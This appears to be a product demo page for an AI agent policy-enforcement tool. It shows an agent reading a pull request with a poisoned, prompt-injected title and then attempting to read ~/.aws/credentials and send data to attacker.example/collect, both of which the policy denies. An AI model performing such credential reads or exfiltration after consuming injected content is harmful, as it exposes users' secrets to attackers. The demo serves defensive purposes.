CirvixFlagship demo
Trusted content can lie.
The boundary still holds.
Silent-friendly, measured by the actual local engine. The poisoned PR title is allowed to be read; the prohibited downstream actions are not.
agentreceives task: review PR #4821READY
readgithub.get_pull_request → poisoned title visibleALLOW
attemptfilesystem.read ~/.aws/credentialsDENY
attempthttp.request attacker.example/collectDENY
audithash-linked decision record written locallyRECORDED
nextinstall command shownREADY
The demo does not claim to detect prompt injection. It demonstrates policy enforcement after the agent has consumed trusted content. Run the exact sequence locally to inspect the real audit record.